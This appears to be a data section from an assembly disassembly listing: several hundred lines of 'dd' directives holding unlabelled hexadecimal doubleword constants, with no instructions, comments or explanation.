dd 247C1C09h, 6B753BFBh, 6C81B9BFh, 4D79B8BEh, 30992BF4h
dd 0FD1C82FBh, 264FF195h, 0F0CC08C7h, 714283EEh, 4EA152AFh
dd 0E079F2FBh, 0FFAA36BFh, 0D5F4203Eh, 0B85966C3h, 26CBBDBAh
dd 0DF08D61Fh, 8AD6E951h, 0B45B22F6h, 4C6D65F7h, 3E4FB946h
dd 0FFA200DBh, 95F8D657h, 0F489BD1Bh, 7B34F4B4h, 80323C4Eh
dd 488D8E62h, 28AF6CD3h, 8FBBAE04h, 996D3984h, 0A231E311h
dd 451F0FECh, 0DA1D7043h, 0B64AF766h, 48FDE5Ah, 93A9030Dh
dd 0FC1BCB44h, 791E9EBFh, 79A3B2A2h, 6B210ECDh, 0A8F5ADEFh
dd 7CB52C9Bh, 0C4CCF531h, 1AB7B978h, 853B2035h, 7095AC48h
dd 69A5CABDh, 0E2D89F03h, 0A77A6660h, 2BEB5DA1h, 45765A6Ah
dd 0B5A3EBD9h, 0B57D8184h, 0E97108DEh, 0BEDB4165h, 14D31567h
dd 0FAD0601h, 529CDEFFh, 0A5B3B508h, 0CE16B76Fh, 707D216Fh
dd 597FA77h, 7CE26D1Eh, 0B88DBE9h, 0E6D4DD52h, 0E24D5028h
dd 7DFC88A8h, 35446EEFh, 0FB03CEEFh, 0E8639A62h, 0FD6E8149h
dd 0A67AD1F8h, 0B302DD3Fh, 7B0FC053h, 8F2A97ADh, 3FB822Dh
dd 5E78EA93h, 0ACE0FDC8h, 0AEF0A204h, 6AADD49Dh, 4C5FF49Ch
dd 0FE57F8C4h, 0DF48D7DFh, 0FA1679E6h, 0DF607C5Ah, 0BACD3554h
dd 212DBB1Fh, 6F91E3C8h, 0A47E4545h, 77952C1Dh, 201F693Dh
dd 31365D79h, 92F8799Dh, 2069A6FDh, 7B6E9FCBh, 0DFF0F6F0h
dd 0F8827555h, 7D01A67h, 1DC1F9C5h, 0FA2EBB5Fh, 0AFFAF6ECh
dd 3972B6CAh, 0EE5026B6h, 0CA8DC1F0h, 422D14F0h, 0EC278E83h
dd 6CC766EFh, 0EF6B86F2h, 5684D75Fh, 0B854BC8Ah, 6A6F876Ch
dd 5E087F77h, 0FFF5C3AAh, 9FA74AC3h, 713A0DCh, 1BAF9590h
dd 2B6B5EBCh, 0F9AD713h, 0C2761B8Dh, 17F9F45Bh, 68746815h
dd 66C6DB4h, 30315639h, 4EE5C93Bh, 257DFFC9h, 9FC21281h
dd 3CCCDA2Ch, 0BB218BF6h, 5E945A33h, 186D178Ch, 1C319379h
dd 779F468h, 6D03B9C2h, 0D59DCBA5h, 2A9425C8h, 2B74AD77h
dd 6D6E3688h, 2586690Eh, 0AC060EB8h, 0B4E149F3h, 1713E7F6h
dd 6039C78h, 0E62B86B3h, 9AD570Ah, 0CE0F261Ah, 0ABD9842Ch
dd 42FEF16Ch, 5ABA4EE7h, 12D1B5DBh, 0E1CFFA0h, 0FF0D5A8Ch
dd 0B4A21883h, 0AA648BB8h, 0E5990556h, 0A8732370h, 0DF19CE6Ch
dd 6D0AB51Bh, 5ABEB5FDh, 4AFB25DDh, 6727E84Ah, 0CA66F250h
dd 817C0C0Bh, 0BE071135h, 53B2DBE8h, 2D14DE15h, 46995985h
dd 0C37F4EDBh, 0B7073B4Fh, 0B8640176h, 0DDC5B471h, 0F51D8A8Ah
dd 0DB85E7CDh, 8C8BA119h, 8949ACA0h, 615AE81Dh, 8817F96Bh
dd 32BD3DD0h, 46D5D559h, 203DC7A2h, 1B8BE23Bh, 0D0779B4Bh
dd 4433B2E7h, 0A3441A57h, 1FD9BDCDh, 0F96A015Ah, 0FF078EA4h
dd 19F72E4Bh, 0AD910D48h, 844F61BAh, 0B468AC61h, 87C6ADE1h
dd 0D60242F6h, 0E449C6CDh, 6EA8AF89h, 0F012A5F7h, 0AD1F2B76h
dd 0AE02BCAEh, 49B41CF5h, 64022D57h, 0FABED415h, 9352FD6Dh
dd 7C972D2Ch, 0ABF51DD3h, 0EB43F150h, 8FE392E7h, 680D6E9Ch
dd 950E89F2h, 0D4C17C5Eh, 5F9879D2h, 92E950D4h, 8D245034h
dd 6FF739A3h, 86992A51h, 0CB455BE8h, 3CE76B7Ch, 6A2F8260h
dd 0BBC2C14Ah, 6940A9D6h, 5BC144AAh, 0A285E1B4h, 80AF9BEAh
dd 956F88FFh, 0D748AB4Ch, 5DE7ED29h, 5C6C47F4h, 0B7AE9058h
dd 0DE137824h, 78388340h, 9875F41Dh, 6E6FAF86h, 0DFB2BCD4h
dd 0C5ED162Dh, 84BDFE69h, 0BCFD1760h, 34B0D3C0h, 0C728B9F1h
dd 5A68AE94h, 89C6A1DCh, 785BF741h, 36CDF05Dh, 0D97C5FFBh
dd 0BA6AE2F5h, 4F46ED56h, 97F4B158h, 106AB225h, 7E0C67D8h
dd 8940519Bh, 4B963E38h, 0F48B5B50h, 9C07564Bh, 0C9C4C14Ch
dd 129192F0h, 0F79FF3B5h, 4B45CB75h, 2382AA05h, 0DCCA0A97h
dd 274293F6h, 0E32C7892h, 0EA15B73h, 0AF7C00B3h, 8BCD9BF7h
dd 78BCBEABh, 543F13D0h, 7C27BC13h, 0D3FCCD29h, 0DC279664h
dd 0E2813707h, 0DF1DE303h, 0E78DE425h, 0A7386D4h, 9121E4EEh
dd 7BE56B22h, 0B0AEF432h, 3AE2CB53h, 0E82AB0FAh, 7E8056A5h
dd 0F952E0A8h, 0DA3CD80Ah, 376AB2D0h, 85CF0652h, 6C5FD3C2h
dd 855E1F6Dh, 0B8F7D55Eh, 0FA629045h, 0D6D54525h, 5204855Ah
dd 2C8D6483h, 0AF86B0h, 951A4BF7h, 0E0CB0D5Bh, 28205BF1h
dd 0BDE2FE55h, 0A80C79D5h, 6656A93Ch, 0B3729749h, 2AAF682Dh
dd 709EF354h, 33CA6778h, 442C1FB5h, 1D9BF5DCh, 0C5FABEEFh
dd 235C6DA3h, 5E1355CAh, 6F0418Eh, 60FF9260h, 2C98AAB8h
dd 808B80A2h, 81B0F6FEh, 9C20A75Fh, 0E0F0A0EEh, 0D1A79CA7h
dd 0BF115FE4h, 44B40803h, 0EB26276Eh, 0E681EB58h, 91E8F6B8h
dd 1FB6B7F3h, 2E822BE6h, 15052FD9h, 0F3DA254Ah, 0D84D58D7h
dd 3BA789D3h, 0F6E7E7EFh, 0A8017AB2h, 0FABC3F91h, 4572BD19h
dd 0A860C637h, 5D0B5004h, 96FBA418h, 42FC9C15h, 1E85132Fh
dd 0F12F7FBEh, 793A3C10h, 50334682h, 0C055D019h, 0B956ECEEh
dd 2FD6E32Dh, 2EB4487Ah, 0B01913A2h, 811E6AE2h, 7B281C7Eh
dd 2AF59DB7h, 9762FBDBh, 0AC0DFBC5h, 3E30A0FAh, 74E18AAEh
dd 56568B7Eh, 107BCECDh, 5C2AB4D6h, 15C804h, 21FFC56Dh
dd 0F7955AC4h, 0BB3EDB97h, 0FA4DBE89h, 2BD6E113h, 60F8F60Dh
dd 0A2B0012Ch, 92A7F27h, 0EC82B641h, 3CF92CA5h, 20FD737h
dd 89AE9153h, 0F481FF9Ch, 2D4C9991h, 22DAFC15h, 84C87E22h
dd 54BA96EDh, 0C03AE9A6h, 5F88D97Dh, 0C867A17Ch, 0D88DA328h
dd 0EA93EDB0h, 0F50575B2h, 0EC02BACCh, 63F43155h, 8F4FD46Bh
dd 0E2AC3C9h, 50DD289Dh, 90FC140Ah, 7621FBAAh, 5AB8A445h
dd 399D5225h, 0F80DE25Fh, 7FEB810Dh, 0EAED8EC0h, 0CA5864A8h
dd 0DF9D8B5Bh, 4A1E97DFh, 64157D48h, 0DE059EE6h, 0E703F7A4h
dd 0D88BCF80h, 0B75D34C5h, 0AE47D66Fh, 154AD18Ch, 9CF7571Ch
dd 0C352D987h, 4760A1C1h, 1C055DB6h, 9B750435h, 0F5D7AF9Ch
dd 0AD50AD25h, 0C1E42F9Ch, 770A7CBBh, 0FCD9954h, 545C2A0Bh
dd 0B4826134h, 3AF755BEh, 4530B26Fh, 0C6D8404Bh, 74A63C06h
dd 0C8437957h, 5E631658h, 0CBB5BB11h, 2784428h, 0FF866170h
dd 0A2B1E3AAh, 0AE7B33A2h, 826923B8h, 1F84F0BEh, 3AA373Dh
dd 0E7646A89h, 2AC0F9A4h, 19DFACEDh, 6262FF7Dh, 0C1C2544Ah
dd 29D665FBh, 0AD966F28h, 0A045FAC3h, 9AC0C77Ah, 0B353792h
dd 5AB18933h, 0EE685432h, 49E57075h, 0AD73F01Ah, 0E9D56A09h
dd 69B122FBh, 57CE5A26h, 578C1CF1h, 0E5FBF359h, 0E8AE92F7h
dd 0EF70F3Fh, 5FAA3AA9h
dd 0BCDC2E5Eh, 0F71BAFC5h, 40AB4AD6h, 0D2A9776Ch, 7A8A8365h
dd 0DEC1B5A8h, 212731EFh, 8428AF94h, 6A41FE1Eh, 73DBC8E9h
dd 0A8427DBBh, 0B82B617Fh, 545B813Dh, 0C7A84E44h, 3D3E5DEh
dd 0D0C617D4h, 6FC88852h, 8505A2DCh, 73935EADh, 4642F4Eh
dd 4D469395h, 6BACF60h, 60617CE7h, 0C9A69F7Eh, 13ACBB04h
dd 6EADD767h, 0EB9B9A55h, 0B549D94Fh, 0A2CA25C5h, 7A91BF82h
dd 0E9C2E2F5h, 0E4D11792h, 0AA67EA83h, 7B568672h, 0E1B991FCh
dd 0DF0033C8h, 0ABC02CFAh, 8F0D3B5Fh, 0E982210Ah, 0FBDDD80h
dd 55AA2979h, 2D1445F5h, 0B493FDC8h, 0CE858FE3h, 405BA77h
dd 92EECC88h, 56E9457h, 7EC74528h, 3315FEA9h, 382D66F0h
dd 3F888783h, 1BA302DDh, 9E2817B7h, 348CEB83h, 42FBCD29h
dd 6835BCE3h, 671778A4h, 395EF0EAh, 0D69AB012h, 0B08AE966h
dd 783E2572h, 20D1712Fh, 0B2A13DC4h, 3F7DDC9Dh, 3FDFA199h
dd 91F3C0F7h, 0CC4D2CD6h, 0D680A58h, 7BF6241h, 958FB967h
dd 1CDFAD8Dh, 8F3B4B15h, 7B46AEF3h, 2B5E6BB7h, 0DA55DD08h
dd 735B1946h, 0B547955Eh, 0C2701168h, 9DE57417h, 6F7E6A3Ah
dd 7175864Dh, 0F7B2978h, 50CC9BCCh, 505158B9h, 6FFE0115h
dd 6C9EAC2Ch, 6D2C008Bh, 0EE96E0ADh, 55E5838Dh, 0BF771F31h
dd 51E494F0h, 0B09DB030h, 0FE6CBEBEh, 27761C42h, 0B96C4C4Ch
dd 768DBACh, 0F0681FDh, 95E90BFEh, 7C94DD0Eh, 3C117E33h
dd 8C5F74F7h, 1F9DD9EAh, 0F08BF3F7h, 74E906F9h, 4F52C9CCh
dd 0BDE5C196h, 0DBF31E25h, 9E8FF6FDh, 457977EFh, 48157053h
dd 351C4A54h, 0D1B4157h, 0D1D116F2h, 38D05E05h, 0F006202Ah
dd 55CABE7Bh, 5ADC7ABBh, 0D08A2C2Eh, 0CAAE65E4h, 39D407B1h
dd 3396C125h, 1D3D4474h, 0CC0EB6ACh, 8958BB05h, 32D585D5h
dd 1A93C7E0h, 5210D1E1h, 672B5D59h, 0AA94ADF0h, 6EF065CCh
dd 2E3D5EEEh, 0BDA2E3AAh, 533DBE33h, 2C4C69D4h, 0AB457C88h
dd 70177B13h, 0C7F64F46h, 0AA253365h, 5EDA45F2h, 0B45FEE85h
dd 0B21A1709h, 537328A9h, 0AE6CDFCCh, 23EE6AA2h, 0A92CC262h
dd 243DBF98h, 0ACE2E03h, 0C5F2C5CEh, 92E26138h, 6BFC4ACBh
dd 0DC851262h, 3D749DB2h, 0EA34254Ah, 1B0FC3FDh, 0FB66092Eh
dd 33271E43h, 11EF6B97h, 40AAB579h, 0AAE6C1D7h, 0B3B839C6h
dd 8FCD2571h, 0CB473F38h, 1A672AD8h, 7A291CECh, 4F96BFCBh
dd 0A3E20968h, 0E51C05BDh, 64A94BC2h, 595E417Ch, 7720A051h
dd 2249EA10h, 1875119Bh, 4787E9E8h, 0E1603E53h, 0BE5DB64Dh
dd 4854B830h, 253A937Ch, 6C0D75E6h, 6B81EE87h, 0E0E7D5C7h
dd 0FCE96F66h, 4B0F311Dh, 8BD3BD4h, 0A181F7F4h, 0FA2FBCF9h
dd 5713E8BEh, 0D5B1B3BBh, 49EC0715h, 0D702C95Fh, 43135523h
dd 5AB46729h, 0C37F52FCh, 43F05CC7h, 89DA6CEEh, 0A1E5D47Eh
dd 0F1B8B0D7h, 53F130F3h, 0EAF707D7h, 13C0F5AEh, 0D989849Dh
dd 0E5BB8D56h, 6A62AE53h, 695E79E4h, 0A56CDE84h, 0ADB5A525h
dd 9773959h, 492B7285h, 0EE4668FAh, 0ADE6041Eh, 84316473h
dd 4DACBF73h, 0CBFC7EB8h, 59BC71DDh, 36C4E43h, 15D6C5BAh
dd 8CD63389h, 68CBE4F5h, 0BFC7716h, 0F0CFA745h, 0F9D5BB87h
dd 8D51AAD5h, 5BF13E2Ah, 0AD4ABA20h, 0B82D0E2Dh, 4F83E4FFh
dd 9749C4A6h, 607EDB2Fh, 3CAB62A8h, 485A97F1h, 4B37D645h
dd 2D8FBF99h, 1B0D8DC0h, 0F4EE717Bh, 678F38A0h, 96EEDAAh
dd 0DAB507CDh, 0AAA597E4h, 58E51BDAh, 75A3D7C5h, 107A2441h
dd 5A9A7748h, 4C6F26Ch, 0AEE28B71h, 717FDAECh, 8E7ABED9h
dd 13FB2705h, 3F538810h, 9B4FCE55h, 0A47EAC3Ch, 2F0BF103h
dd 1F3C3964h, 9454BF53h, 0C5A91BFAh, 3DB54E02h, 1306113Bh
dd 34114B83h, 0ADA805BFh, 0F79E06A6h, 2983F2C1h, 18F590Eh
dd 0E1AEF94Bh, 0CB3B9045h, 0ABEDF4E9h, 55E7D603h, 1E0C5412h
dd 0B5B8E015h, 0F64ED2C2h, 6D12FEF4h, 0DD79D6AAh, 0E200B7CDh
dd 2A5B66EBh, 0BE7853D9h, 4D2EC84h, 0CFA4AF16h, 8AE5FD35h
dd 0F71CF928h, 645BF839h, 51D0E34h, 73D767CBh, 0A90A1CBAh
dd 0D6F1A061h, 11F3CBFFh, 0EAC82DD6h, 0A106A56Fh, 7994D15Ah
dd 2CBE26FAh, 6F9601BCh, 8DAE99A8h, 0DAD7D4E0h, 0F9E352BEh
dd 428966FBh, 5310E6DAh, 2C85E9B4h, 653DCB75h, 81A49A83h
dd 0D6DF33Dh, 0D146EFF4h, 0CE626C24h, 51BD4BEAh, 2CD4CBCDh
dd 9316D94Ch, 0A014DEF6h, 0E71FFC5h, 0D61735AEh, 675C7E38h
dd 0BB5B8735h, 0ADAFBDF1h, 2EC77E1Fh, 853D460Eh, 79DE930Fh
dd 0CB91F1F8h, 3E15E3FAh, 8BC854F3h, 20751532h, 0CCFEBF1Fh
dd 59C0F26Eh, 0B3384C8Ch, 0B83451ADh, 0B222C49Dh, 0CD8AC789h
dd 6B02B1B7h, 0A45CDBB5h, 3455B9BFh, 47396886h, 4FB89655h
dd 0C80ADFE1h, 57528968h, 46AC1117h, 0D637CFE6h, 0A978BD3Ch
dd 0BCC095B0h, 4795B192h, 8B135970h, 0F0CBB211h, 0D8D17F7Eh
dd 0F31325BAh, 0AEE14DC9h, 0D5E77D49h, 9D9BF9F2h, 87EE16ACh
dd 0E617D046h, 0A962A511h, 68539D31h, 0BB4E7ECBh, 73D5A555h
dd 252D7527h, 6BB2555Bh, 211A0C9Ch, 4A25B792h, 0FE0F59CFh
dd 0ABCDD6B2h, 685FA0F2h, 5CEF3220h, 20D215A1h, 8FF6B942h
dd 66E8C8E2h, 7D75FC40h, 6A5689DFh, 374578E5h, 1B3D3BCAh
dd 0C9965B64h, 5347A60h, 9C43BA3Fh, 89D3A1D1h, 6B9F237Eh
dd 6DA24DF0h, 0C48063AEh, 64A5EFD1h, 0D627F4B4h, 0AB9A4283h
dd 86869F02h, 0C62566EAh, 43D4543Dh, 3A7F2623h, 32D9A736h
dd 91CC028h, 5015DE4Eh, 9EC6AC53h, 7352B0Bh, 7D994E48h
dd 0FDD5221Fh, 7E143295h, 3C58F12Ah, 249FEF27h, 0AB099A19h
dd 0C234D658h, 0FB0DA3BAh, 0C6A8BB97h, 0DCACE60h, 7E148B0Fh
dd 0F9D74B3Ah, 33D3F5F2h, 5F59EA5Dh, 0A1206D9Eh, 0EAF03D3Ah
dd 0E1CCE7B2h, 0AF68E1FAh, 0DD78A64h, 7CFAAD31h, 5C61AE7Dh
dd 0FFF1DD7Fh, 92EE697Ch, 684C5A2Dh, 0DEA82DA6h, 0B2BAA6F1h
dd 0F198F121h, 38555529h, 2C86F966h, 12B5AD40h, 582E3315h
dd 7D0CAA54h, 2C5B33D8h, 2F6955FFh, 9F115618h, 72775669h
dd 0A36B0746h, 0E16E1D11h, 0A867619h, 0C92FEAADh, 0DFBFD4F2h
dd 0FCAB7EF2h, 0CAEACF85h, 0EFE26294h, 8982A816h, 0DD2FB3C2h
dd 7D34A261h, 34BF4FCCh, 0AADAEDDCh, 9E236575h, 0A8EEDF0h
dd 0D956F8E2h, 39CAA3C2h, 716131FAh, 0CD72E6CAh, 0A4FDC8F3h
dd 84E7774Eh, 0EE19DF8Eh, 0F820701h, 55D9F32Ch, 5DC07133h
dd 2DE1BAFCh, 0A8932E9Eh, 0E35445D4h, 0FA6C9CA2h, 1EB199EDh
dd 71E07465h, 287338Eh, 4A85046Dh, 2243FD51h, 0A5B37DDBh
dd 44FF97DBh, 0B1C3F13Bh, 2F8821E6h, 0B5950AB5h, 0A3F75FEDh
dd 739F63DAh, 1F83FD2Fh, 49B5AB88h, 73005547h, 9B03D19Dh
dd 0CF729CC4h, 0BD5A4E1Bh, 0FA5C95FEh, 9237F78Ch, 2D3A3EF7h
dd 0DCC3AEC8h, 2DD19F56h, 0DDA8D80Ch, 6FC7B03Ch, 8A041264h
dd 0BCE753B6h, 6BD707A0h, 8D5FEFECh, 0D6CC605h, 0E23BB6D4h
dd 8959787Eh, 0F9788057h, 81844A76h, 6E1F8FB1h, 42C79FD5h
dd 0FE5FA912h, 795C7986h, 390FC5E3h, 0A0E86652h, 0B24B9725h
dd 66D43DCAh, 0D902E28Dh, 0A3CFB691h, 8690867Dh, 47EF9CDFh
dd 6F2D316Dh, 0C4ED7445h, 0B7FD55F9h, 0F09A4902h, 8DFDB96Ah
dd 0CF65DF35h, 0C59933E7h, 7A81F4F0h, 0FFE8DFD6h, 0D5407095h
dd 20CBA443h, 51FAB513h, 84A11107h, 0F382C5F2h, 0EB608B71h
dd 9FBEDE62h, 0E8103BA3h, 51DAAA23h, 512AEEC3h, 25A62B68h
dd 0E736D1EBh, 2F825908h
dd 0F87FF6FDh, 0ADF2E9C3h, 766DA8D3h, 0EAD2AAC0h, 0BA026E5Bh
dd 0A581FB6Bh, 36945E0Bh, 0F73D1FC5h, 0FE2C1898h, 33BE72B7h
dd 8FA0BC4Eh, 0D3CBA718h, 0A3B1F746h, 31305C62h, 0BB9DAC57h
dd 2EEECD00h, 10F9334Bh, 0E9E2DBB7h, 356D51B5h, 0F8F9C753h
dd 2102AB24h, 0D3E45E76h, 860783FCh, 0E5F6BD4Bh, 0D4AD4E87h
dd 5A329EB6h, 0D5CB9544h, 66AD815h, 0ACBAD107h, 5C9D6C07h
dd 29FABC81h, 21BDCC2Ch, 428EEE28h, 2C0E338Ah, 0AA201350h
dd 0AD10585Fh, 6BB8AF14h, 516A7FBDh, 80F1BC7h, 0D875EC52h
dd 15F79628h, 512196h, 6EF0247Ah, 0FA5E4D50h, 52E6A16Eh
dd 9B77E2F8h, 233F3F73h, 0AB131054h, 0B7F7FAh, 0B4573073h
dd 922BFA35h, 54FEDFDFh, 8BF09BF9h, 0D7401AAEh, 3B98DCB5h
dd 55AF1AD7h, 1339828Bh, 4B40BFEBh, 0A075E4CBh, 716BDFEFh
dd 9C3F21D0h, 7A67A355h, 0BCC56CEFh, 3F787E16h, 0F9EA5AF0h
dd 853FB4Ch, 5CC783C3h, 8DC2DC99h, 0BDD64C0Fh, 16EDACEFh
dd 0F440B6FCh, 74233174h, 4751B99Fh, 2A594623h, 3B0FC0FDh
dd 0A3E2B75Fh, 0C6AFCE34h, 80BB8B1h, 8CEAEECBh, 9DDBE4Ah
dd 0E355A733h, 6BC2F149h, 81E4DB28h, 75FB72CEh, 0C796AE8Dh
dd 95D68FA4h, 0EA210FB6h, 97E1594Dh, 0E3672E58h, 559A1599h
dd 5D270AD3h, 0A5680FB9h, 0CCD707DFh, 1A199AC5h, 5B16FB38h
dd 5A08FC2Eh, 0AAEB589h, 68E3AE8Eh, 2DB0CE3Ah, 948D5DCCh
dd 0D7B10AE3h, 0CD61BD9Ch, 8675C1AEh, 7FCB5586h, 85553452h
dd 6790E092h, 8E295A77h, 0EF1FDB6Bh, 0E8C6549Dh, 0ED54BB39h
dd 46C537A9h, 749727EEh, 168EAF68h, 0F645F5F9h, 87D6452Bh
dd 0C5E1BE82h, 34ABE49Dh, 0AACE4192h, 91FF65FBh, 0F11D95CCh
dd 28A955A1h, 0E20D34Dh, 697B476Fh, 8F519F3Eh, 0CC85FB1Dh
dd 0F0D297F7h, 5D38BEBCh, 137F1FE8h, 0E43BE85Fh, 0CD19BDD4h
dd 5C3FB913h, 55910509h, 43DF91A5h, 56E20117h, 0A9F41B5Ch
dd 45521F80h, 0E0BD66D8h, 4C9607BDh, 0F1BDE996h, 6B38E1A1h
dd 0FBF64D6Ah, 45FB3EDCh, 145DD34Eh, 0C5F3B77Bh, 0CD669B7Eh
dd 5363D92h, 0C4A1C294h, 8A28101h, 752CCEB6h, 0E8112074h
dd 28854ED1h, 0C99FC995h, 698B1986h, 1F8A5E7Fh, 4989B47Bh
dd 0DDDC8B4Dh, 0F1F554A9h, 0C57D0860h, 45F82BF8h, 0D1787C00h
dd 35366ACBh, 0DF8DF5F3h, 0BFC5FEFFh, 2D065FC8h, 5FFF0D23h
dd 0F37E84B8h, 5D957515h, 0CF5D478Bh, 39A617E5h, 0C8E35B6Bh
dd 0A17F9C16h, 0EF4EA383h, 4EE23F68h, 0A9E52E16h, 0D7D9DCADh
dd 0E824F797h, 7CA0CF07h, 0DABD7896h, 21EEA0CAh, 0BB8EF792h
dd 526D82EDh, 55AB80D6h, 6F3C02BEh, 0D02AF2D4h, 52B14F1Eh
dd 339DFC1Fh, 45DD0151h, 57E62BEFh, 2BB458E7h, 6D84561Dh
dd 0FCA7B4D7h, 0AA46A558h, 0E6C6672Dh, 91F7FC3Eh, 0BBF4FB44h
dd 0EF432D57h, 6833D5B3h, 9A98E52Ch, 2C16E0F2h, 0E4A061ECh
dd 0D47A6C7Ch, 292712E7h, 0EEC1ABA8h, 47942B5Bh, 0C883BBC7h
dd 0F3EA201Dh, 73D09D18h, 263FB318h, 0E9C26C3Fh, 8D6BBA4h
dd 3F1B85E7h, 0A9F6CEB7h, 8A7814E5h, 4A463703h, 0CFED407Dh
dd 0D2485AE8h, 0BB5CAF72h, 0BA2F6142h, 93B98B00h, 0D579C5A6h
dd 7DE5790Eh, 39095706h, 9BF6F1D9h, 4DADD095h, 7EF46CCFh
dd 0C422B515h, 273A9BC8h, 7A1F8E8Bh, 4888910Ch, 29FD88EEh
dd 2B2DAF41h, 63423DB3h, 0A856B3AAh, 90CDE2BFh, 0E35FF382h
dd 0D24614B8h, 250BAE1Ch, 0A572BEA9h, 0C641C543h, 158D88DFh
dd 56312350h, 0ADEBBC13h, 70A54961h, 0EA4E23CAh, 0D2142F86h
dd 0D64DC5B3h, 0AA141CDCh, 0ECCFE006h, 3FD97D5Ah, 0D1B28D14h
dd 51E05894h, 8F6D269Ch, 359948B4h, 4241C269h, 496C2B3Dh
dd 15E1BAB7h, 3A1155B3h, 0D1D7A260h, 55DB7CADh, 14779B9Bh
dd 0CFC695F2h, 267C0C55h, 17EFD3F0h, 16A6FD4Dh, 0F48B5555h
dd 28EEB698h, 2B71C347h, 338380AFh, 261368BEh, 4C6644F8h
dd 3CF5C528h, 0CECD48D3h, 0A1F0A1D7h, 0D707DACDh, 0E009FF84h
dd 0FB39C1E1h, 47703F29h, 3C627BCBh, 75BBD232h, 6EDF3650h
dd 9732966Eh, 1D56A15Dh, 545C1B32h, 0C5DC12DCh, 698057F3h
dd 5131C48Dh, 5208AA4Bh, 23ECDD8Ah, 0F560AB89h, 0D80B3E0h
dd 79560D6Fh, 674F535Dh, 2814EFC5h, 95FEE7ABh, 5AB09037h
dd 9B1C7CC6h, 45799EF2h, 55ED1C6Ah, 4C9BBCACh, 9F7F8157h
dd 4508C0F0h, 0EC51C2FFh, 0A7F2F1A7h, 0F2F502CFh, 5EE60962h
dd 9917FDFBh, 7225F900h, 93B2DF3Bh, 0C5C98D8Ch, 0DA27B14Ch
dd 7C555787h, 6C0F23D9h, 0F9AACBCh, 7A27194Bh, 691D0ECh
dd 97EC5DC9h, 0FAB74759h, 0DC9DDABAh, 0B3850E59h, 0E5F4ECCBh
dd 0E6745FC7h, 188D6DFCh, 0B5602CA0h, 3C1F6E03h, 126326DFh
dd 0E64BF82Dh, 0D36EE7D0h, 0C31DBDDh, 3F116A9Ah, 811E28DCh
dd 2987B903h, 26BA33F2h, 0E30B87C3h, 0BF75810Dh, 645FEE51h
dd 0DFEAB69Bh, 0CD2D1015h, 5F1293F0h, 0EFC524CFh, 3174C481h
dd 6CFBA8FAh, 4E0AF94Eh, 0DD9E29CCh, 1EEA66BFh, 0A7D72EB4h
dd 9FD91B5Bh, 0EADB38FBh, 5BB8ABA2h, 7E026949h, 0DA2AF47h
dd 0F8559C95h, 29778FDCh, 0ADA14906h, 13FB3F6Dh, 32FD459h
dd 3869E4A4h, 0CBE197D4h, 0A816B5D9h, 0FA14DBB4h, 2CD7E1D0h
dd 40EB4FA9h, 70FC342Bh, 64D6F738h, 0CE07B4BDh, 10D909FAh
dd 0DE694AE1h, 5A23DB06h, 0AF6A6728h, 353E8FBEh, 2853F99Ah
dd 0AD9E8E98h, 0E706CABAh, 0D529D3A8h, 35F93ACFh, 0A3562130h
dd 0B8EABB1Ah, 0A7EE1A53h, 8DA8045Eh, 0DC3146A8h, 0AA810623h
dd 133358EEh, 0C96771DAh, 50559C7Fh, 0A57E8232h, 1AA591F5h
dd 0CD42D135h, 0AC0C1DFEh, 695D51CDh, 956D1BF3h, 0C31F2D14h
dd 815591D9h, 0E1B956F8h, 0ABF6774Eh, 17821697h, 86ACAA8Ch
dd 2860FEACh, 7DF33A43h, 8A6C8BD5h, 0DA19408h, 57B3090Fh
dd 0C5772A20h, 8FBCFBE1h, 0E2EFBD96h, 92981E87h, 92F2A5C4h
dd 0FE6721F6h, 8D84CC7Dh, 0E712BA96h, 2FAE0FAAh, 78BA03Ah
dd 36AA7EA3h, 6E5EDB57h, 4104F258h, 0BAF3D5Ah, 58898C3Bh
dd 84550206h, 0BA7F156Bh, 450755BFh, 2EBF1619h, 0BC1C06E8h
dd 0A0A9D85Dh, 0F8250FABh, 0D1A973C0h, 0F0B17A4Fh, 0BE115A86h
dd 0A2A255A9h, 71B7F106h, 0D1ACCC00h, 841A25C6h, 797694AFh
dd 0DC68AD62h, 3C7EDA8Fh, 5B961642h, 0C981BEF2h, 0BCFDF14h
dd 4C76CE58h, 0ADF4D566h, 804FEFE5h, 0F02EAC7Fh, 0AED6F577h
dd 3F13824Ah, 3A0B3D18h, 0CC3F1BA9h, 0A5AABCEAh, 42665C75h
dd 9C4F7CCEh, 9958BE17h, 357837A3h, 0C45A38B5h, 754F26C8h
dd 1BA298C0h, 0D6A9F02Fh, 17DE3473h, 0FA6B9516h, 99429FCAh
dd 5391FE93h, 0D4DA390Fh, 296C4156h, 956EB281h, 46179BC5h
dd 574F7EB9h, 0EB9BCD14h, 416FB4D5h, 0A28E3431h, 0FBF070Bh
dd 9AC7892h, 0E5F797C9h, 0B4E093C2h, 7CB6B9D1h, 16A72FE9h
dd 6E6BED74h, 5C9072F3h, 0E8F5F6B3h, 4F12261Ah, 0AEB66D03h
dd 5F950808h, 34D209D7h, 52F3AF80h, 0A3892115h, 44FCAAECh
dd 5743FCh, 4B6D4550h, 0A3333EC0h, 9EC25604h, 78962B03h
dd 0F3B7E97Eh, 178B464Ah, 0D72E5786h, 2E575B83h, 0E77797A5h
dd 81833C68h, 0B09B5125h, 7FD5417Ah, 46A27A73h, 0FF701FD2h
dd 0AF14968Bh, 0CFE5BE1Ah, 975898BAh, 0F9579DEEh, 32D6EC05h
dd 0B9DA0BFAh, 7BB7B22Dh, 5ECF820Eh, 3300FF2Eh, 0E981F07Fh
dd 0D40E95D4h, 1DC081B7h, 43DC6A22h, 0C5576214h, 0D0D5D42Dh
dd 3C71446Dh, 2DC1BC4Dh
dd 0E70327D6h, 0C0CED63h, 0E1302FCBh, 0ACE7F43Bh, 305DDF43h
dd 8E1FB449h, 0F611B71Ah, 133DFC03h, 0E3C3B49h, 98061D85h
dd 0CA06BFA2h, 1E05DAEh, 0EAE75E1Fh, 8FB2E756h, 296B85F8h
dd 0E62A45E4h, 2051E4Fh, 7E890C0Fh, 9AC5368Fh, 0E5A27CDBh
dd 46A685BBh, 0D83FD907h, 338308C1h, 3CCD6243h, 0A7472C76h
dd 195F9D9h, 8EAFBDEBh, 52DEE1A7h, 71E38FEBh, 34E73B0Ah
dd 0FB3A0463h, 375D9BFCh, 2B542AF6h, 8AF45A61h, 0AC91ACE2h
dd 9EBF9BC5h, 0DD68BFA9h, 20723026h, 0FEF8DD46h, 0C2F82F97h
dd 0EF2CD27Eh, 96EBAB0Fh, 0C67CF8CDh, 1EDBC555h, 8E2532CEh
dd 0CFCB937Eh, 0BFB4FA7Ch, 5511DB09h, 0AF5960D4h, 70F810D4h
